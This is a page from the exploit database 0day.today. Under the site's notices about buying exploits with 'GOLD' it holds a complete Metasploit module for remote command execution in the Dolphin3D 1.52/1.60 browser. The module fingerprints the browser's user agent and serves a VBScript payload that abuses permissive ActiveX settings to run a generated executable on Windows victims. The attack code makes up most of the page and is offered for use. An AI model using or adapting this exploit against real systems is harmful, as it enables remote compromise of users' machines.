0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Dolphin3D 1.52 / 1.60 Command Execution Vulnerability
## # # Dolphin3D web browser ActiveX Remote Command Execution # # Date: Dez 9 2012 # Author: Rh0 # Affected Version: Dolphin3D 1.52 and 1.60 # Tested on: Windows XP Professional SP3 EN # ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Dolphin3D web browser ActiveX Exec', 'Description' => %q{ This module exploits the default security setting in the Dolphin3D web browser. The default security setting ("cautious") allows arbitrary ActiveX Controls, thus remote command execution. }, ## NOTE: There exists a higher security setting called "jungle-safe". ## It disables javascript/vbscript completely, which is the ## the only measure to forbit unsafe ActiveX Objects. ## bug vs. feature :) see: http://www.dolphin3d.com/safest.html 'Author' => [ 'Rh0 <rh0[at]z1p.biz>', # discovery and metasploit module ], 'Targets' => [ [ 'Windows - Dolphin3D Browser 1.52 and 1.60', { 'Platform' => 'win', 'Arch' => ARCH_X86 } ], ], 'DefaultTarget' => 0, 'Platform' => ['win'], 'DisclosureDate' => "Dez 9 2012" )) end def on_request_uri(cli,request) agent = request.headers['USER-AGENT'] if request.uri =~ /\.ico/ print_status("Ignoring request for #{request.uri}") send_not_found(cli) ## dolphin user agent ends with "Avant Browser)" ## could conflict with Avant Browser, see ## http://www.useragentstring.com/_uas_Avant%20Browser_version_.php) elsif agent =~ /Avant Browser\)$/ print_status("Sending vbs payload") send_response(cli,exe_script,{"Content-Type" => "text/html"}) else print_status("Ignoring request from #{agent}") send_not_found(cli) end end def exe_script() exe = generate_payload_exe() vbs = Msf::Util::EXE.to_exe_vbs(exe) #vbs = 'CreateObject("wscript.shell").run"calc",1,false' # PoC return "<script language=vbscript>#{vbs}</script>" end end # 0day.today [2024-12-23] #